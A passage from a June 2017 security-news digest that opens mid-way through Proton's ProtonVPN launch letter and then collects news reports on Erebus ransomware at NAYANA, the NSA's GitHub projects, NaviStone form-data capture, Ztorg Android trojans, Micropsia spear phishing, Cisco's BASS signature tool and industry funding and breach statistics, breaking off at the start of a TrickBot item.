Since then, the Internet has met or even exceeded its promise in certain areas, but this has not come without a cost to society. While the Internet has done a great deal of good, over the course of this digital revolution, we have also lost control over our data, our most intimate secrets, and ultimately our privacy. In certain countries, the Internet has even become a tool for oppression and control, instead of the beacon of hope and freedom it once was.

Back in 2013, we embarked on a journey to change this, by building the tools that could make privacy and security the default online. In 2014, on the 25th anniversary of the web, our efforts culminated with the release of ProtonMail, the world’s first end-to-end encrypted email service. Since then millions of people around the world have embraced our vision, and thanks to your support (and the numerous donations along the way), email is much safer today than it was several years ago.

However, when considering the scope of all that we do online, email is just a small piece of the online world. That’s why we have decided to build ProtonVPN, to better protect the activists, journalists, and individuals who are currently using ProtonMail to secure their online lives. A VPN (Virtual Private Network) allows users to browse the web without being tracked, bypass online censorship blocks, and also increases security by passing all internet traffic through a strongly encrypted tunnel.

The importance of VPNs for online security and privacy is increasing day by day. Back in April of this year, Obama-era FTC rules designed to protect the privacy of internet browsing history were rolled back. Fast forward to today, and attempts are being made to dismantle net neutrality in the US, and several European governments are now calling for increased online surveillance. Last but not least, for over 1.5 billion people around the world, the Internet does not live up to its promise of freedom of information. Instead, the Internet is a highly restricted and censored place, constantly under surveillance, where making a wrong move could lead to imprisonment or worse.

We are also aware that as ProtonMail becomes a stronger force for digital freedom, the censorship of ProtonMail in certain countries is not a matter of if, but a matter of when. Earlier this year, we took the first steps to improve ProtonMail’s availability under censorship by launching an Onion site. With ProtonVPN, we can ensure the accessibility of not only ProtonMail, but all of the world’s digital knowledge and information. This is why we are committed to providing a free version of ProtonVPN.

However, we have done more than make ProtonVPN free. We have also worked to make it the best VPN service ever created, by addressing many of the common pitfalls with VPNs. For example, ProtonVPN features a Secure Core architecture which routes traffic through multiple encrypted tunnels in multiple countries to better defend against network based attacks, and also features seamless integration with the Tor anonymity network. You can learn about all the steps we took to build a secure VPN here.

Lastly, we’re building a VPN service that can be worthy of your trust. We understand that when it comes to VPNs, trust is paramount. Whether it is our transparent VPN threat model, our Swiss jurisdiction, our reputation, our relationship with the community, or the fact that you actually know who we are, we’re committed to building and operating ProtonVPN with the same level of transparency that has come to characterize ProtonMail.

ProtonVPN

To all of you who have supported us over the years, thank you for your support. Unlike companies like Google and Facebook who abuse user privacy to sell advertisements, ProtonMail and ProtonVPN are entirely dependent on users upgrading to paid accounts to cover operating expenses. Without your support, these projects would not be able to thrive and grow. If you appreciate the security and privacy that ProtonVPN provides, and have the means to do so, please consider upgrading to a paid account. This allows us to support the millions around the world without these means.

With your help, the revolution we have started with ProtonMail will continue, and we will reach the day where the Internet serves all of us equally, and reaches its full potential as a tool for freedom.

Best Regards,
The Proton Technologies Team

You can find our launch press release here: https://protonvpn.com/blog/launch-press-release


South Korean hosting provider NAYANA infected by Erebus ransomware, it paid $1 Million to crooks
21.6.2017 securityaffairs
Ransomware

South Korean web hosting company NAYANA was hit by the Erebus ransomware that infected 153 Linux servers and over 3,400 business websites the company hosts.
The South Korean web hosting provider NAYANA has paid $1 million in bitcoins to crooks after a Linux ransomware infected its systems. its 153 servers, encrypting 3,400 business websites and their data, hosted on them.

The ransomware encrypted files of 153 servers, roughly 3,400 business websites have been impacted.

“On June 10, South Korean web hosting company NAYANA was hit by Erebus ransomware (detected by Trend Micro as RANSOM_ELFEREBUS.A), infecting 153 Linux servers and over 3,400 business websites the company hosts.” reported Trend Micro that revealed the ransomware used in the attack is Erebus.

The attack happened on 10th June, the cyber criminals demanded a 550 bitcoins payment (over $1.6 million) to unlock the encrypted files. NAYANA after a negotiation with the cyber criminals has agreed to pay 397.6 bitcoins (around $1.01 million) in three installments.

The web hosting provider has already paid two installments and would complete the payment once recovered its data from two-third of the infected servers.
“On June 18, NAYANA started the process of recovering the servers in batches. Some of the servers in the second batch are currently experiencing database (DB) errors. A third payment installment is also expected to be paid after the first and second batches of servers have been successfully recovered.” continues Trend Micro.

The Erebus Linux ransomware was first spotted in September 2016, in February a new version was improved implementing Windows’ User Account Control bypass capabilities.

The experts observed that the servers of the Korean hosting provider were running on Linux kernel 2.6.24.2, a circumstance that exposed them to known attacks such as DIRTY COW Linux exploit. It is also possible that the attackers exploited flaws in outdated Apache version 1.3.36 used by the company.
“NAYANA’s website runs on Linux kernel 2.6.24.2, which was compiled back in 2008. Security flaws like DIRTY COW that can provide attackers root access to vulnerable Linux systems are just some of the threats it may have been exposed to.” states Trend Micro..

“Additionally, NAYANA’s website uses Apache version 1.3.36 and PHP version 5.1.4, both of which were released back in 2006. Apache vulnerabilities and PHP exploits are well-known; in fact, there was even a tool sold in the Chinese underground expressly for exploiting Apache Struts.”

The Erebus ransomware is targeting users in South Korea, it leveraged RSA-2048 algorithm to encrypt office documents, databases, archives, and multimedia files. The private key is encrypted using AES encryption and another randomly generated key.

The malicious code appends a .ecrypt extension to the encrypted files.

“The file is first scrambled with RC4 encryption in 500kB blocks with randomly generated keys,” continues the analysis. “The RC4 key is then encoded with AES encryption algorithm, which is stored in the file. The AES key is again encrypted using RSA-2048 algorithm that is also stored in the file.”


National Security Agency opens the NSA Github Account that already lists 32 Projects
21.6.2017 securityaffairs BigBrothers

It is official, the National Security Agency (NSA) has presented its GitHub page that includes 32 projects as part of the NSA Technology Transfer Program.
The National Security Agency has opened its GitHub account and presented an official GitHub page. The US intelligence agency employees numerous excellent experts that in the past demonstrated extraordinary abilities in developing hacking tools, exploits and surveillance solutions.

The work of the NSA experts was secret until the Snowden’s revelations, but now the Agency seems to be more social and the creation of the Github account demonstrates it.

Giving a look at the GitHub account we can notices that the NSA is sharing 32 different projects as part of the NSA Technology Transfer Program (TTP), while some of these are ‘coming soon.’

“The NSA Technology Transfer Program (TTP) transfers NSA-developed technology to industry, academia, and other research organizations, benefitting the economy and the Agency mission. The program has an extensive portfolio of patented technologies across multiple technology areas” states the description of the NSA program.

Many projects shared by the NSA are very old and were already available online, such as the SELinux (Security-Enhanced Linux).

“The NSA Technology Transfer Program (TTP) works with agency innovators who wish to use this collaborative model for transferring their technology to the commercial marketplace,” the agency wrote on the program’s page.

“OSS invites the cooperative development of technology, encouraging broad use and adoption. The public benefits by adopting, enhancing, adapting, or commercializing the software. The government benefits from the open source community’s enhancements to the technology.”

NSA Github Account

Other NSA’s open source projects are below:
Certificate Authority Situational Awareness (CASA): A Simple tool that Identifies unexpected and prohibited certificate authority certificates on Windows systems.
Control Flow Integrity: A hardware-based technique to prevent memory corruption exploitations.
GRASSMARLIN: It provides IP network situational awareness of ICS and SCADA networks to support network security.
Open Attestation: A project to remotely retrieve and verify system integrity using Trusted Platform Module (TPM).
RedhawkSDR: It is a software-defined radio (SDR) framework that provides tools to develop, deploy, and manage software radio applications in real-time.
OZONE Widget Framework (OWF): It is basically a web application, which runs in your browser, allows users to create lightweight widgets and easily access all their online tools from one location.
The full list of NSA’s projects is available here.


Elastic Beam Emerges From Stealth With API Security Solution

21.6.2017 securityweek Security
Redwood City, Calif.-based Elastic Beam emerged from stealth mode on Wednesday with the launch of a security solution designed to detect and block cyberattacks targeting application programming interfaces (APIs).

The company’s flagship product, API Behavioral Security (ABS), is an engine that uses artificial intelligence (AI) to detect threats in real time. Data from ABS is sent to the API Security Enforcer (ASE) to block the attack and prevent the attacker from reconnecting.

According to Elastic Beam, its solution can detect data exfiltration, unauthorized changes or removal of data, distributed denial-of-service (DDoS) attacks, code injections, brute force attempts and authentication via stolen credentials, API memory attacks, WebSocket attacks and other types of external and insider threats.

The product, designed for API gateways, API management platforms and app servers, works in both public and hybrid cloud environments and on premises. The vendor says it also has the ability to scale automatically using elastic clustering.

“We look at the whole traffic pattern between the end-point/client and the system being accessed,” Bernard Harguindeguy, founder and CEO of Elastic Beam, told SecurityWeek. “We implemented AI algorithms that combine advanced AI techniques with our strong API behavior and security expertise to automatically sort out sessions that are not normal.”

“The system does not use predefined policies or security rules, it is self-learning, and uses the AI engine to continuously update knowledge of the environment and traffic. It uses much more than a traditional baseline to identify an attack. Also the attacks are identified as such – not just anomalies. So we will flag anomalies if something is ‘off’ but not really an attack – and we will identify an attack when we believe that it is truly an attack,” Harguindeguy explained.

API Behavioral Security (ABS) dashboard

For forensic analysis and reporting purposes, Elastic Beam says its product provides tracking and reporting capabilities for all API activity. The solution also includes a decoy API feature that relies on a deception mechanism to lure hackers and capture attack information for analysis.

The product is available through a subscription pricing model based primarily on API transaction volumes. Elastic Beam, which has so far been funded by its founders and angel investors, says ABS has already been tested in banks, government agencies, cloud services and IoT environments.


Cybereason Raises $100 Million to Hunt Attackers

21.6.2017 securityweek IT
Boston, MA-based Cybereason today announced that it has raised $100 million in Series D funding from SoftBank Corp. This increases the total investment in the cyber attack detection firm to $189 million since its inception in 2012. It raised $25 million in Series B financing and $59 million in Series C financing, both in 2015.

The new investment follows Cybereason's continued growth: 500% in revenue and almost 200% in staff over the last year. Lior Div, co-founder and CEO of Cybereason, commented, "This new funding allows us to increase our growth through new distribution channels and to develop new technologies."

Cybereason LogoTokyo-based Softbank is not merely Cybereason's major investor, it is also an important customer. "Our strengthened partnership with SoftBank, which has a formidable sales force and enterprise customer base in Japan and a global reach, will also enable us to further expand our presence in the cybersecurity market," added Div. "The new capital," he said, enables Cybereason "to expand our products, hire additional talented people and increase the size of our offices in Boston, Tel Aviv, London and Tokyo -- and throughout the broader EMEA and APAC regions," he said.

Cybereason is one of the new breed of endpoint security solutions that rely heavily on machine learning and behavioral analytics to detect threats in realtime without reliance on malware signatures. Many of its direct competitors have shown similar levels of investment in recent years. Crowdstrike raised $100 in Series C financing in July 2015, and a further $100 million in Series D in May 2017. Cylance also raised $100 million in Series D funding in June 2016, while SentinelOne raised $70 million in January 2017.

Cybereason, like Endgame (which has raised more than $90 million in funding), seeks to differentiate itself from the competition by not merely detecting anomalies, but actively hunting for the attacker. "This approach," it says, "allows hunting to strengthen the organization's security posture while slowing down the adversary and decreasing their dwell time. The results of a hunt can be used to build new prevention mechanisms, ensuring that the discovered security incidents do not happen again."

"Software," says Div, "is the most powerful force in today’s connected world. People can use its power for good or evil, and the mission of Cybereason is to stop the adversary from gaining an unfair advantage by giving our customers the upper hand."


WebSites Found Collecting Data from Online Forms Even Before You Click Submit
21.6.2017 thehackernews Security

'Do I really need to give this website so much about me?'
That's exactly what I usually think after filling but before submitting a web form online asking for my personal details to continue.
I am sure most of you would either close the whole tab or would edit already typed details (or filled up by browser's auto-fill feature) before clicking 'Submit' — Isn't it?
But closing the tab or editing your information hardly makes any difference because as soon as you have typed or auto-filled anything into the online form, the website captures it automatically in the background using JavaScript, even if you haven't clicked the Submit button.
During an investigation, Gizmodo has discovered that code from NaviStone used by hundreds of websites, invisibly grabs each piece of information as you fill it out in a web form before you could hit 'Send' or 'Submit.'
NaviStone is an Ohio-based startup that advertises itself as a service to unmask anonymous website visitors and find out their home addresses.
There are at least 100 websites that are using NaviStone's code, according to BuiltWith, a service that tells you what tech sites employ.
Gizmodo tested dozens of those websites and found that majority of sites captured visitors' email addresses only, but some websites also captured their personal information, like home addresses and other typed or auto-filled information.
How Websites Collect 'Data' Before Submitting Web Forms

Using JavaScript, the websites in question were sending user's typed or auto-filled information of an online form to a server at "murdoog.com," which is owned by NaviStone, leaving no option for people who immediately change their minds and close the page.
When the publication asked NaviStone that how it unmasks anonymous website visitors, the company denied revealing anything, saying that "its technology is proprietary and awaiting a patent."
However, when asked whether email addresses are gathered in order to identify the person and their home addresses, the company's chief operating officer Allen Abbott said NaviStone does not "use email addresses in any way to link with postal addresses or any other form of PII [Personal Identifiable Information]."
"Rather than use email addresses to generate advertising communications, we actually use the presence of an email address as a suppression factor, since it indicates that email, and not direct mail, is their preferred method of receiving advertising messages," Abbott said.
Some websites using NaviStone's code are collecting information on visitors who are not even their customers and do not share any relationship with the companies.
"Three sites—hardware site Rockler.com, gift site CollectionsEtc.com, and clothing site BostonProper.com—sent us emails about items we'd left in our shopping carts using the email addresses we'd typed onto the site but had not formally submitted," Gizmodo writes.
After the story had gone live, NaviStone agreed to no longer collect email addresses from visitors this way, as Abbott said, "While we believe our technology has been appropriately used, we have decided to change the system operation such that email addresses are not captured until the visitor hits the 'submit' button."
Disable Auto-Fill; It’s Leaking Your Information!
In order to protect yourself from such websites collecting your data without your consent, you should consider disabling auto-fill form feature, which is turned on by default, in your browser, password manager or extension settings.
At the beginning this year, we also warned you about the Auto-fill feature, which automatically fills out web form based on data you have previously entered in similar fields but can be misused by attackers hiding fields (out of sight) in the web form and stealing your personal information without your knowledge.
Here's how to turn this feature off in Chrome:
Go to Settings → Show Advanced Settings at the bottom, and under the Passwords and Forms section uncheck Enable Autofill box to fill out web forms with a single click.
In Opera, go to Settings → Autofill and turn it off.
In Safari, go to Preferences and click on AutoFill to turn it off.
Also, think twice before filling your details into any web form, before it gets too late.


Next Windows 10 Version May Have Built-in EMET Anti-Exploit Program
21.6.2017 thehackernews Safety

It seems Microsoft is planning to build its EMET anti-exploit tool into the kernel of Windows 10 Creator Update (also known as RedStone 3), which is expected to release in September/October 2017.
So you may not have to separately download and install EMET in the upcoming version of the Windows 10.
If true, this would be the second big change Microsoft is making in its Windows 10 Fall update after planning to remove SMBv1 to enhance its users security.
EMET or Enhanced Mitigation Experience Toolkit, currently optional, is a free anti-exploit toolkit for Microsoft's Windows operating systems designed to boost the security of your computer against complex threats such as zero-day vulnerabilities.

"EMET helps protect your computer systems even before new and undiscovered threats are formally addressed by security updates and antimalware software," Microsoft site reads.
Basically EMET detects and prevents buffer overflows and memory corruption vulnerabilities, often used in zero-day attacks.
A few EMET features are already built into Windows 10 including DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization), but the current version of Windows 10 doesn't offer the same level of protection as Windows 10 with EMET installed.
The following chart, created by researchers from Carnegie Mellon University's Software Engineering Institute, clearly indicates that Windows 10 with EMET offers better protection than alone Windows 10 does.

Since Microsoft has already announced that the company will discontinue the support of EMET in July 2018, we believe the company has planned to built-in support for all remaining EMET features in the next version of Windows 10.
"There are no plans to offer support or security patching for EMET after July 31, 2018. For improved security, our recommendation is for customers to migrate to Windows 10," Microsoft said last year.
A tweet from Alex Ionescu, Windows security expert, with a screenshot hints that Microsoft may release its next stable version of Windows 10 with "built-in EMET into the kernel."
Also, we noticed that Alex's tweet was later retweeted by at least two security researchers from Microsoft team, which indirectly confirms the news.

However, we tried to reach out to two of the Microsoft researchers, one of them hasn't responded yet, while other denied commenting at this moment.
EMET provides both system-wide as well as application-specific protection, which works by watching internal operating system operations for known security exploits and holes, and blocking attacks both on the OS and third-party applications.
The tool also mitigates the system against the well-known "untrusted fonts" attack, which is often leveraged in Web-based cyber attacks to compromise PCs and install malware.
Besides this, EMET also offers buffer overflow protection to applications that may be vulnerable to stack and buffer overflow attacks that malware uses to interact with the operating system.
So, let's just wait for the big news to be confirmed by Microsoft.


NSA Opens Github Account — Lists 32 Projects Developed by the Agency
21.6.2017 thehackernews BigBrothers

The National Security Agency (NSA) — the United States intelligence agency which is known for its secrecy and working in the dark — has finally joined GitHub and launched an official GitHub page.
The NSA employs genius-level coders and brightest mathematicians, who continually work to break codes, gather intelligence on everyone, and develop hacking tools like EternalBlue that was leaked by the Shadow Brokers in April and abused by the WannaCry ransomware last month to wreak havoc worldwide.
The intelligence agency mostly works in secret, but after Edward Snowden leaks in 2013, the NSA has started (slowly) opening itself to the world. It joined Twitter in the same year after Snowden leaks and now opened a Github account.
GitHub is an online service designed for sharing code amongst programmers and open source community, and so far, the NSA is sharing 32 different projects as part of the NSA Technology Transfer Program (TTP), while some of these are 'coming soon.'
"The NSA Technology Transfer Program (TTP) works with agency innovators who wish to use this collaborative model for transferring their technology to the commercial marketplace," the agency wrote on the program's page.
"OSS invites the cooperative development of technology, encouraging broad use and adoption. The public benefits by adopting, enhancing, adapting, or commercializing the software. The government benefits from the open source community's enhancements to the technology."
Many of the projects the agency listed are years old that have been available on the Internet for some time. For example, SELinux (Security-Enhanced Linux) has been part of the Linux kernel for years.
Some of the NSA's open source projects are listed below:
Certificate Authority Situational Awareness (CASA): A Simple tool that Identifies unexpected and prohibited certificate authority certificates on Windows systems.
Control Flow Integrity: A hardware-based technique to prevent memory corruption exploitations.
GRASSMARLIN: It provides IP network situational awareness of ICS an
d SCADA networks to support network security.
Open Attestation: A project to remotely retrieve and verify system integrity using Trusted Platform Module (TPM).
RedhawkSDR: It is a software-defined radio (SDR) framework that provides tools to develop, deploy, and manage software radio applications in real-time.
OZONE Widget Framework (OWF): It is basically a web application, which runs in your browser, allows users to create lightweight widgets and easily access all their online tools from one location.
You can check out the full list of NSA's projects here.


 


Italské ministerstvo zahraničí se stalo terčem hackerského hnutí Anonymous

21.6.2017 Novinky/Bezpečnost Hacking
Italské ministerstvo zahraničí v úterý oznámilo, že vyšetřuje pokus o hackerský útok na své počítače. Hackerská skupina, která se označuje jako italská odnož hnutí Anonymous, předtím zveřejnila některá data, která podle ní ukradla z počítačů ministerstva. Není zatím jasné, zda jsou mezi těmito údaji nějaké citlivé informace, uvedla agentura Reuters.
Ministerstvo v prohlášení uvedlo, že s úřadem prokurátora spolupracují při vyšetřování jeho technici, podrobnosti o pokusu proniknout do počítačů ale neuvedlo.

Hackeři o útoku informovali na serveru cyberguerrilla.org. Na server nahráli například tabulky nazvané "ubytování zaměstnanců" a "cestování/výdaje". Umístili tam například i odkazy na soubory obsahující stovky e-mailových adres.

"Jen se dál bavte na svých summitech, ve svých komisích... G7, G8, zpravodajské služby, sledování, terorismus," píše se na stránce. "Už jsme věděli, že my Italové platíme. Mezitím si prosím užijte necenzurované zveřejnění některých dat ukradených z vašeho vzácného informačního systému," napsali hackeři.


Cisco Talos releases the BASS open source malware signature generator
21.6.2017 securityaffairs Security

Cisco Talos intelligence group released an open source framework named BASS that is designed for automatically generating antivirus signatures from malware.
BASS is an automated signature synthesizer, it is able to automatically create signatures from the analysis of a malicious code that belongs to previously generated clusters.

The BASS tool aims to simplify malware analysis and its main goals are to improve resource usage and make malware analysis easier.

BASS is designed to reduce the resource usage of Cisco ClamAV open source antivirus engine, it aims to generate more pattern-based signatures instead of hash-based signatures.

Every day the ClamAV database is integrated with thousands of new signatures and many of them are hash-based. Unfortunately, using hashes to detect a malware allows the identification of single malicious file and not an entire malware cluster.

BASS tool

“BASS (pronounced “bæs”) is a framework designed to automatically generate antivirus signatures from samples belonging to previously generated malware clusters. It is meant to reduce resource usage of ClamAV by producing more pattern-based signatures as opposed to hash-based signatures, and to alleviate the workload of analysts who write pattern-based signatures. The framework is easily scalable thanks to Docker.” reads the description for the Framework published on GitHub.

“Please note that this framework is still considered in the Alpha stage and as a result, it will have some rough edges. As this tool is open source and actively maintained by us, we gladly welcome any feedback from the community on improving the functionality of BASS.”

BASS is written in Python framework implemented as a cluster of Docker containers. It is scalable and implements web services that allow it interacting other tools.

Experts at Cisco Talos explained the BASS framework is able to import malware clusters from various sources. Once the malware cluster is filtered to check that the files correspond to the input expected by BASS framework, the binaries are disassembled using IDA Pro or other disassemblers, then BASS searches the samples for common code that can be used to generate the signature.


Two Ztorg Trojans Removed from Google Play Store Are Definitely Better
21.6.2017 securityaffairs Android

For the second time in a month, Google removed malicious apps infected with the Ztorg Trojans that could allow attackers to root targeted devices.
Most software developers update their apps to patch vulnerabilities and add new features. But when the software is malware, an update could be the worst thing to do. The Google Play Store is always working to prevent malware from being downloaded by unsuspecting users and recently two apps built with the Ztorg malware were removed. The two apps, “Magic Browser” and “Noise Detector,” are believed to have been benign when they were originally uploaded to the Play Store, but the bad guys were updated the software using the malware toolkit over time.

Ztorg Trojans

The Ztorg Malware toolkit was identified by Kaspersky Labs in September, 2016 with “Guide for Pokémon Go.” At the time it was identified the Guide had been downloaded over 500,000 times and researchers estimate at least 6,000 successful infections. Since that time, dozens of apps associated with Ztorg have been distributed and eventually removed from the Google Play Store. And like all good developers, the bad guys using Ztorg are adding features and capabilities over time.

Once the initial app is installed, it utilizes a wide range of advanced techniques to evade detection, get updates from the Command and Control infrastructure and ultimately try to get Root on the phone. From Fortinet researchers:

It implements many emulator detection features. It detects the Android SDK emulator, but also emulators from Genymotion, Bluestacks and BuilDroid. It also detects tainted environments. Several of its checks will be difficult to bypass.
It uses string obfuscation, based on XOR.
It communicates with a remote server using DES-CBC encryption.
It downloads, installs and launches an Android application from that remote server.
What happens when your smartphone is infected with a Ztorg trojan? Like most malware, the bad guys’ ultimate objective is to make money. Initial Ztorg trojans leveraged AdWare to generate money for the bad guys through legitimate advertising networks. Some of the techniques included redirecting webpages, messing with search results and collecting information about what sites you visit. These are legitimate, if unwanted, business activities, but in the case of the bad guys distributing trojan apps, the users participate unknowingly. The bad guys get all the profits, and the users get a poorly performing phone, that may even become unstable or unusable.

The two apps recently removed from the Google Play Store, “Magic Browser” and “Noise Detector” show an evolution of Ztorg Trojan capabilities and include some nifty new techniques for making illegitimate money. Premium Rate SMS is a business model where an individual sends a specific text message and the fees are automatically charged to the user’s mobile phone bill. For example, you could donate money for disaster relief simply by texting an amount with your phone. The latest Ztorg trojan leverages this Premium Rate SMS system, with the proceeds going to the bad guys. And like the rest of the Ztorg system, they use some sophisticated techniques to maximize their profits and minimize their chances of being caught.

Once infected, the trojan lies dormant for 10 minutes. In this way, if the user notices something odd, they are less likely to associate it with the app they just installed. After the delay, the trojan sends the first five digits of the phone’s International Mobile Subscriber Identity (IMSI) to the C&C servers. This part of the IMSI identifies what network the phone is connected to, and in what country. With this information the C&C can determine which Premium Rate SMS services are available and the trojan starts racking up the bills. And since most of these SMS services will reply with a txt message receipt or notice, the Ztorg Trojans delete incoming SMS messages. It seems obvious that a user would notice missing legitimate messages, but in the meantime the bad guys are counting their profits.

Mobile phones are convenient because they are compact, powerful and use a lot of simple shortcuts to makeup for the lack of a keyboard and a large screen. App stores make it easy to install new apps but it isn’t always obvious what the apps themselves are doing.

“The Ztorg Trojan continues to appear on the Google Play Store, accompanied by new tricks to bypass security and infect as many different Android devices and OS versions as possible. Even if a victim downloads what is clearly a clean app, there is no guarantee that it will still be clean in a few days’ time. Users, Google and security researchers need to remain vigilant at all times and to be proactive about protection,” says Roman Unuchek, researcher at Kaspersky Labs.


Time to Detect Compromise Improves, While Detection to Containment Worsens: Report

21.6.2017 securityweek Security
Cost of Malvertising is Minimal; Price of Zero-days is Rising, Researchers Say

Throughout 2016, Trustwave investigated hundreds of data breaches in 21 different countries, and conducted thousands of penetration tests across databases, networks and applications. An analysis of key findings from this activity is presented in the 2017 Trustwave Global Security Report published Tuesday (PDF).

The result is a mixed bag. Overall, security defenses have slightly improved, but attacks continue to evolve. Detection is improving. Trustwave says the median time to detect a compromise has decreased from 80.5 days in 2015 to 49 days in 2016. The difference between self-detected and third-party detections is, however, dramatic: just 16 days for self-detected and 65 days for externally detected.

It should surprise no-one that a company that has invested in security technology able to detect intrusions would detect intrusions faster than a company that relies on external detections. Nevertheless, this demonstrates the effectiveness of those controls in reducing the dwell time and reducing the attackers' window for exfiltration.

Containment, however, has not improved to any similar degree. The duration from intrusion to containment has dropped from 63 days in 2015 to 62 days in 2016; but the time taken from detection to containment has worsened slightly from 2 days to 2.5 days.

According to Trustwave's figures, North America geographically, and retail vertically, are the most breached sectors. POS breaches rose sharply -- particularly in North America, which has been slow to adopt EMV cards -- from 22% of breaches in 2015 to 31% in 2016.

Malvertising remained the number one source of traffic to exploit kit landing pages; and the cost of malvertising is remarkably low. Trustwave ran its own experiment running online ads testing for vulnerable versions of Flash. "Researchers," notes the report, "estimate an attacker could reach approximately 1,000 computers with exploitable vulnerabilities for about $5 -- less than $.01 per vulnerable machine — far less than the $80 to $400 per 1,000 computers attackers pay for access to infected machines, depending on geolocation."

SecurityWeek asked Lawrence Munro, worldwide VP of SpiderLabs at Trustwave, for his two biggest takeaways from this year's report. What concerns him most is the continuing instance of common vulnerabilities in the majority of applications. "These are not esoteric vulnerabilities," he said, "but ones that map closely to the OWASP Top 10." During 2016, Trustwave's application scanning services found that 99.7% of applications had at least one vulnerability, while the mean number of vulnerabilities was 11 per application.

"Trustwave's on-demand penetration testing service, uncovered almost 30,000 vulnerabilities in web applications in 2016. Analysts classified 79 percent of them as informational or low-risk vulnerabilities, 11 percent as medium-risk, 7 percent as high-risk and 3 percent as critical, the most severe category."

Among the critical vulnerabilities, 13.8% involved authentication bypass. 5.7% involved Heartbleed leakage, 5.1% involved vertical privilege escalation, 4.8% was unencrypted sensitive data and 4.2% were SQLi vulnerabilities.

It is worth stressing that Trustwave's vulnerability scanning was undertaken for customers on commercial applications -- and the clear implication is that developers are still not building in security during development before release.

Munro's second takeaway is the cost of vulnerabilities for sale on the underground market. Trustwave's researchers discovered an alleged zero-day Windows vulnerability being offered for sale at $95,000. Although not following through with an actual purchase, Trustwave researchers on the underground forums believe this was a genuine zero-day being genuinely sold.

"The offer first appeared on a website," explains the report, "that serves as an underground marketplace for Russian-speaking cybercriminals to buy and sell coding services, access to exploit kits and botnet resources, and other illegitimate products and services. A user going by the name 'BuggiCorp' posted a message on May 11 offering to sell a local privilege escalation (LPE) exploit for the Windows kernel for $95,000."

In part, the sale offer reads (translated): "[the vulnerability] exists in all OS [versions], starting from Windows 2000. [The] exploit is implemented for all OS architectures (x86 and x64), starting from Windows XP, including Windows Server versions, and up to current variants of Windows 10."

Trustwave concludes that this was a genuine zero-day being offered for sale, partly because the seller insisted on using the forum's administrator as an escrow party. "The escrow requirement," notes the report, "suggests the offer was real: If BuggiCorp could not deliver the exploit as promised, it would not get paid."

What most intrigued Munro, however, was not the sale of zero-days on the dark web; but the price being demanded. "If zero-days can trade at these figures on the dark web," he asked, "what does that say about the effectiveness of current bug bounty schemes, which rarely pay out anything like this amount?"


Spear Phishing Campaign Targets Palestinian Law Enforcement

21.6.2017 securityweek Phishing
Palestinian law enforcement agencies and other targets within Palestine were targeted in a spear phishing campaign delivering malware to remotely control infected systems, Talos researchers reveal.

The actor behind this campaign “has appeared to have used genuine documents stolen from Palestinian sources as well as a controversial music video as part of the attack,” Talos says. The attacker also referenced TV show characters and included German language words within the attack, researchers discovered.

Information on these attacks initially emerged in March from Chinese security firm Qihoo 360, and in early April, when researchers at Palo Alto Networks and ClearSky revealed four malware families being used in targeted campaigns in the Middle East: Windows-based Kasperagent and Micropsia, and Android-focused SecureUpdate and Vamp.

Last week, ThreatConnect shared some additional information on Kasperagent, sayung the threat was mainly used as a reconnaissance tool and downloader, but that newer samples can also steal passwords from browsers, take screenshots, log keystrokes, execute arbitrary commands, and exfiltrate files.

Focusing on Micropsia, Talos’ new report also reveals that Palestinian law enforcement agencies were the main target in the analyzed campaign. The attack featured spear phishing emails purportedly coming from an individual named “Yasser Saad,” but which included a mismatch: the email address suggested “Yasser Saaid” was the sender.

A .r10 file was attached, suggesting it is part of a split archive, but instead it was a disguised RAR, with a malicious “InternetPolicy_xxx_pdf.exe” file inside. When the file is run, a decoy InternetPolicy.pdf file containing 7 pages is displayed, while the Micropsia Remote Administration Tool (RAT) is executed in the background.

Drive-by download campaigns that drop variants of the malware but use different decoy documents were also observed, Talos says.

Written in Delphi, the RAT uses a legitimate binary developed by OptimumX to create a shortcut to ensure persistence. The malware’s configuration file contains the User-Agent, the command and control (C&C) URL and the json keys used for the network communication.

Micropsia can connect to the C&C infrastructure to download and run an executable received in string format and then modified to become a binary file with the Hex2Bin Delphi API. It also uses WMI queries to get information about the anti-virus program running on the machine. These details are sent to the attacker.

The malware registers with the C&C via HTTP, sending information such as the filename of the executed malware and the version; the version of the infected Operating System; and the hostname and username encoded in base64. The server would respond in json format with an ID and 3 other Boolean values.

Talos reports that over 500 systems are already registered with the C&C server (the ID is incremented at each new infection). However, the researchers also suggest that some of these hosts could be security researcher sandbox systems.

Moreover, several German words were found in the network communication: Betriebssystem (operating system), Anwendung (application), and Ausfahrt (exit). This doesn’t mean the actor is German, but that they might be trying to cover their tracks.

“In this [campaign] one of the most surprising elements is the overt naming convention: the author deliberately uses references to several US TV show and intentionally uses German words for malware communication. We have no indication if these inclusions are to confuse attribution, to mock analysts, or a lapse of trade craft. This is in contrast to the highly convincing decoy documents which appear to be copies of genuine documents relating to the current situation in Palestine which suggests a high degree of professionalism,” Talos concludes.


Cisco Releases Open Source Malware Signature Generator

20.6.2017 securityweek Security
Cisco’s Talos intelligence and research group announced on Monday the availability of a new open source framework designed for automatically generating antivirus signatures from malware.

The tool, named BASS, has been described as an automated signature synthesizer. The framework creates signatures from malware belonging to previously generated clusters and its main goals are to improve resource usage and make malware analysis easier.

Talos says BASS is designed to reduce the resource usage of Cisco’s ClamAV open source antivirus engine by generating more pattern-based signatures instead of hash-based signatures. The tool can also help reduce the workload of analysts who write pattern-based signatures.

The Python-based framework is implemented as a cluster of Docker containers, which makes it easily scalable, and it leverages web services to interact with other tools.

According to Talos, thousands of signatures are added to the ClamAV database every day and many of them are hash-based. The problem with hash-based signatures, compared to bytecode- and pattern-based signatures, is that a signature is used to identify a single file instead of an entire malware cluster. This has several disadvantages, including a bigger memory footprint.

Pattern-based signatures are easier to maintain compared to bytecode signatures, which is why Cisco prefers this type of signature.

The BASS framework takes malware clusters from various sources and each file is unpacked using ClamAV unpackers. Once the malware cluster is filtered to ensure that the files correspond to the input expected by BASS (i.e. Portable Executable files), the binaries are disassembled using IDA Pro or other disassembler, and the tool searches the samples for common code that can be used to generate the signature.

The source code for the Alpha version of BASS is available on GitHub. Cisco Talos will maintain the tool, but the company welcomes any feedback for improving its functionality.


TrickBot gang is back with new campaigns targeting Payment Processors and CRM Providers
20.6.2017 securityaffairs
BotNet

Threat actors behind the financial trojan TrickBot have been updating its campaigns targeting Payment Processors and CRM Providers.
Threat actors behind Banking Trojan TrickBot switched from financial institutions to Payment processors and CRM providers.

TrickBot was initially observed in September 2016 by the researchers at security firm Fidelis Cybersecurity, that linked it to the Dyre banking trojan.

